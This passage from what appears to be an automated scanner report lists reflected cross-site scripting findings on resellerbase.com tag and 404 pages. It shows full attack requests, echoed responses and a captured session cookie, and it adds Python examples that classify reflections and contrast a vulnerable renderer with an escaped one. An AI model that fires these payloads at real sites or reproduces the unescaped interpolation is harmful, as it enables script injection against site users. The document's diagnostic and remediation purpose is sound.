Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellers58307</title><img src=a onerror=alert(1)>a39cc6ac17735b8d2</title>
...[SNIP]...

2.4368. http://www.resellerbase.com/tag/resellers [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c36a<img%20src%3da%20onerror%3dalert(1)>4146587cd333c5eef was submitted in the REST URL parameter 2. This input was echoed as 5c36a<img src=a onerror=alert(1)>4146587cd333c5eef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/resellers5c36a<img%20src%3da%20onerror%3dalert(1)>4146587cd333c5eef?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellers5c36a<img src=a onerror=alert(1)>4146587cd333c5eef]</td>
...[SNIP]...
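The two findings above show the two reflection contexts the scanner distinguishes: inside the TITLE element (2.4367), whose content is parsed as RCDATA so that markup inside it is inert and the payload must first close the element with </title>, and ordinary text between tags (2.4368), where a bare IMG element with an onerror handler is enough. The Python script below is an added illustration, not part of the scanner output or of the resellerbase.com application. It classifies a reflection offline: it URL-decodes the probe the way the server did, looks for it raw or HTML-encoded in the response body, decides whether it landed inside an unclosed TITLE, and from that whether the payload would execute in a browser. The response fragments are taken from findings 2.4367, 2.4368 and 2.4370 and trimmed to well-formed snippets; the "hardened" body and the no-break-out TITLE case are constructed for contrast.

```python
import html
from urllib.parse import unquote

# Probes exactly as they appear in the request lines of the findings above (URL-encoded).
TITLE_PROBE = "58307</title><img%20src%3da%20onerror%3dalert(1)>a39cc6ac17735b8d2"
TEXT_PROBE = "5c36a<img%20src%3da%20onerror%3dalert(1)>4146587cd333c5eef"
PATH_PROBE = "a4dee<script>alert(1)</script>ddb4db9122a4fffb8"

# Response fragments from findings 2.4367, 2.4368 and 2.4370, trimmed to well-formed snippets
# (the elided parts of the original responses are replaced by minimal surrounding markup).
TITLE_CONTEXT_BODY = (
    "<html><head>\n"
    "<title>Browse by Tag: resellers58307</title><img src=a onerror=alert(1)>a39cc6ac17735b8d2</title>\n"
    "</head><body></body></html>"
)
TEXT_CONTEXT_BODY = (
    "<html><head><title>Browse by Tag: resel</title></head><body>\n"
    '<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : '
    "resellers5c36a<img src=a onerror=alert(1)>4146587cd333c5eef]</td>\n"
    "</body></html>"
)
NOT_FOUND_BODY = (
    "<html><head><title>Error 404</title></head><body>\n"  # head constructed; the <p> is from 2.4370
    "<p>The requested URL /taga4dee<script>alert(1)</script>ddb4db9122a4fffb8/reselling"
    " was not found on this server.</p></body></html>"
)
# Constructed: the IMG payload reflected inside TITLE without the </title> break-out.
TITLE_NO_BREAKOUT_BODY = (
    "<html><head><title>Browse by Tag: x<img src=a onerror=alert(1)>y</title></head>"
    "<body></body></html>"
)
# Constructed: what the 2.4367 response would look like if the tag were HTML-encoded.
HARDENED_BODY = (
    "<html><head><title>Browse by Tag: resellers"
    + html.escape(unquote(TITLE_PROBE), quote=True)
    + "</title></head><body></body></html>"
)


def decode_probe(probe: str) -> str:
    """URL-decode a probe the way the server did before echoing it (%20 -> space, %3d -> =)."""
    return unquote(probe)


def _context_at(body: str, index: int) -> str:
    """Return 'title' if position `index` lies inside an unclosed <title> element, else 'text'."""
    before = body[:index].lower()
    open_at = before.rfind("<title")
    if open_at >= 0 and before.find("</title", open_at) < 0:
        return "title"
    return "text"


def classify_reflection(body: str, probe: str) -> dict:
    """Locate the decoded probe in `body` and judge whether it would run in a browser.

    reflection: 'raw' (verbatim), 'encoded' (HTML-escaped, harmless) or 'absent'.
    context:    'title' or 'text' for raw reflections, otherwise None.
    executes:   raw markup in a text context is parsed as markup; inside TITLE (RCDATA) it
                is only parsed if the payload first closes the element with </title>.
    """
    payload = decode_probe(probe)
    at = body.find(payload)
    if at < 0:
        encoded = html.escape(payload, quote=True) in body
        return {"reflection": "encoded" if encoded else "absent", "context": None, "executes": False}
    context = _context_at(body, at)
    executes = context == "text" or "</title" in payload.lower()
    return {"reflection": "raw", "context": context, "executes": executes}


if __name__ == "__main__":
    for name, body, probe in [
        ("2.4367 title context", TITLE_CONTEXT_BODY, TITLE_PROBE),
        ("2.4368 text context", TEXT_CONTEXT_BODY, TEXT_PROBE),
        ("2.4370 404 page", NOT_FOUND_BODY, PATH_PROBE),
        ("title, no break-out", TITLE_NO_BREAKOUT_BODY, "x<img src=a onerror=alert(1)>y"),
        ("hardened", HARDENED_BODY, TITLE_PROBE),
    ]:
        print(f"{name:22s} {classify_reflection(body, probe)}")
```

The no-break-out case is why the scanner submits two payload shapes for the same parameter: an IMG element that is reflected only inside TITLE is still an unencoded reflection, but it does nothing until the payload also closes the TITLE element.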

2.4369. http://www.resellerbase.com/tag/resellers [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resellers

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 36b56</title><img%20src%3da%20onerror%3dalert(1)>1a91bee8613 was submitted in the REST URL parameter 2. This input was echoed as 36b56</title><img src=a onerror=alert(1)>1a91bee8613 in the application's response. Because the content of the TITLE element is parsed as RCDATA, markup inside it is inert; the payload therefore first closes the element with </title> and only then introduces the IMG element whose onerror handler runs. The %20 and %3d sequences were URL-decoded by the server before the value was echoed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellers36b56</title><img%20src%3da%20onerror%3dalert(1)>1a91bee8613 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellers36b56</title><img src=a onerror=alert(1)>1a91bee8613</title>
...[SNIP]...

2.4370. http://www.resellerbase.com/tag/reselling [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reselling

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4dee<script>alert(1)</script>ddb4db9122a4fffb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. The reflection here is in the application's 404 page, which echoes the requested URL verbatim in its "not found" message; the 404 status does not prevent a browser from rendering the body and running the script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /taga4dee<script>alert(1)</script>ddb4db9122a4fffb8/reselling?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga4dee<script>alert(1)</script>ddb4db9122a4fffb8/reselling?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4371. http://www.resellerbase.com/tag/reselling [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reselling

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db171<script>alert(1)</script>af2203f2fdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagdb171<script>alert(1)</script>af2203f2fdc/reselling HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagdb171<script>alert(1)</script>af2203f2fdc/reselling was not found on this server.</p>
...[SNIP]...
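Findings 2.4370 and 2.4371 show the third reflection point in this group: the server's own 404 page echoes the requested URL verbatim, so a path that never matches a route still yields executable markup. Whichever sink is hit, the remedy is the same: validate the tag slug against an allow-list before routing, and HTML-encode anything that is echoed, including the path on the error page. The Python sketch below is an added example and not the resellerbase.com code, which the report does not show; the page templates are a hypothetical reconstruction of the observed output, written only to contrast the vulnerable interpolation with a hardened version, and the slug pattern is an assumption based on the tag names that appear in the report.

```python
import html
import re

# Tag slugs seen in the report are lower-case words (resellers, reselling, ringtones, script).
# Assumed allow-list: ASCII letters, digits and hyphens, at most 64 characters.
SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,63}$")

# Crude detector for the payload shapes used in the report: a script/img start tag,
# or an on* handler attribute inside any start tag.
ACTIVE_MARKUP_RE = re.compile(r"<\s*(script|img)\b|<[a-z]+[^>]*\bon[a-z]+\s*=", re.IGNORECASE)


def render_tag_page_vulnerable(tag: str) -> str:
    """Hypothetical reconstruction of the observed output: the tag is interpolated verbatim
    into both the TITLE element and the table caption (findings 2.4367 to 2.4369)."""
    return (
        "<html><head>\n"
        f"<title>Browse by Tag: {tag}</title>\n"
        "</head><body>\n"
        f'<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : {tag}]</td>\n'
        "</body></html>"
    )


def render_not_found_vulnerable(request_path: str) -> str:
    """Hypothetical reconstruction of the 404 page in findings 2.4370 and 2.4371."""
    return f"<p>The requested URL {request_path} was not found on this server.</p>"


def render_not_found_hardened(request_path: str) -> str:
    """Same 404 page with the echoed URL HTML-encoded."""
    return f"<p>The requested URL {html.escape(request_path, quote=True)} was not found on this server.</p>"


def render_tag_page_hardened(tag: str, request_path: str) -> tuple:
    """Allow-list the slug, then HTML-encode it once for both text sinks.

    html.escape turns '<' and '>' into entities, which is sufficient for ordinary text and
    for RCDATA inside TITLE alike: an encoded '&lt;/title&gt;' can no longer close the element.
    Returns (status, body) so the caller can send a 404 for slugs that fail validation.
    """
    if not SLUG_RE.match(tag):
        return 404, render_not_found_hardened(request_path)
    safe = html.escape(tag, quote=True)
    return 200, (
        "<html><head>\n"
        f"<title>Browse by Tag: {safe}</title>\n"
        "</head><body>\n"
        f'<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : {safe}]</td>\n'
        "</body></html>"
    )


def has_active_markup(body: str) -> bool:
    """True if the body contains an unencoded script/img tag or an event-handler attribute."""
    return ACTIVE_MARKUP_RE.search(body) is not None


if __name__ == "__main__":
    # Inputs taken from findings 2.4373 and 2.4371.
    probe = "resellingcae0c</title><img src=a onerror=alert(1)>97ac77869a1106386"
    path = "/tagdb171<script>alert(1)</script>af2203f2fdc/reselling"
    print("vulnerable tag page :", has_active_markup(render_tag_page_vulnerable(probe)))
    print("hardened tag page   :", has_active_markup(render_tag_page_hardened(probe, "/tag/" + probe)[1]))
    print("vulnerable 404 page :", has_active_markup(render_not_found_vulnerable(path)))
    print("hardened 404 page   :", has_active_markup(render_not_found_hardened(path)))
```

For a legitimate slug the hardened renderer produces byte-for-byte the same page as the vulnerable one, so the change is invisible to normal users; only values containing characters outside the allow-list are turned away, and anything that is echoed at all is encoded.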

2.4372. http://www.resellerbase.com/tag/reselling [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload acde9<img%20src%3da%20onerror%3dalert(1)>2d5871736f8770bf7 was submitted in the REST URL parameter 2. This input was echoed as acde9<img src=a onerror=alert(1)>2d5871736f8770bf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/resellingacde9<img%20src%3da%20onerror%3dalert(1)>2d5871736f8770bf7?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellingacde9<img src=a onerror=alert(1)>2d5871736f8770bf7]</td>
...[SNIP]...

2.4373. http://www.resellerbase.com/tag/reselling [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload cae0c</title><img%20src%3da%20onerror%3dalert(1)>97ac77869a1106386 was submitted in the REST URL parameter 2. This input was echoed as cae0c</title><img src=a onerror=alert(1)>97ac77869a1106386 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/resellingcae0c</title><img%20src%3da%20onerror%3dalert(1)>97ac77869a1106386?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellingcae0c</title><img src=a onerror=alert(1)>97ac77869a1106386</title>
...[SNIP]...

2.4374. http://www.resellerbase.com/tag/reselling [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0529<img%20src%3da%20onerror%3dalert(1)>eed82fe8528 was submitted in the REST URL parameter 2. This input was echoed as f0529<img src=a onerror=alert(1)>eed82fe8528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellingf0529<img%20src%3da%20onerror%3dalert(1)>eed82fe8528 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resellingf0529<img src=a onerror=alert(1)>eed82fe8528]</td>
...[SNIP]...

2.4375. http://www.resellerbase.com/tag/reselling [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reselling

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e38c2</title><img%20src%3da%20onerror%3dalert(1)>8c7b151cbd1 was submitted in the REST URL parameter 2. This input was echoed as e38c2</title><img src=a onerror=alert(1)>8c7b151cbd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resellinge38c2</title><img%20src%3da%20onerror%3dalert(1)>8c7b151cbd1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resellinge38c2</title><img src=a onerror=alert(1)>8c7b151cbd1</title>
...[SNIP]...

2.4376. http://www.resellerbase.com/tag/ringtones [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ringtones

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b532<script>alert(1)</script>b73e558d1e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag7b532<script>alert(1)</script>b73e558d1e7/ringtones HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag7b532<script>alert(1)</script>b73e558d1e7/ringtones was not found on this server.</p>
...[SNIP]...

2.4377. http://www.resellerbase.com/tag/ringtones [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ringtones

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ec5c<script>alert(1)</script>aeeecf8e03c99484f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /tag5ec5c<script>alert(1)</script>aeeecf8e03c99484f/ringtones?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag5ec5c<script>alert(1)</script>aeeecf8e03c99484f/ringtones?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4378. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ringtones

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2c823</title><img%20src%3da%20onerror%3dalert(1)>722d33dadff was submitted in the REST URL parameter 2. This input was echoed as 2c823</title><img src=a onerror=alert(1)>722d33dadff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/ringtones2c823</title><img%20src%3da%20onerror%3dalert(1)>722d33dadff HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringtones2c823</title><img src=a onerror=alert(1)>722d33dadff</title>
...[SNIP]...

2.4379. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ringtones

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 41e34<img%20src%3da%20onerror%3dalert(1)>55ab17b3474 was submitted in the REST URL parameter 2. This input was echoed as 41e34<img src=a onerror=alert(1)>55ab17b3474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/ringtones41e34<img%20src%3da%20onerror%3dalert(1)>55ab17b3474 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringt
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ringtones41e34<img src=a onerror=alert(1)>55ab17b3474]</td>
...[SNIP]...

2.4380. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ringtones

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 71f84</title><img%20src%3da%20onerror%3dalert(1)>8c9bc4619f122c768 was submitted in the REST URL parameter 2. This input was echoed as 71f84</title><img src=a onerror=alert(1)>8c9bc4619f122c768 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/ringtones71f84</title><img%20src%3da%20onerror%3dalert(1)>8c9bc4619f122c768?sort_by=title&sort_order=asc HTTP/1.1
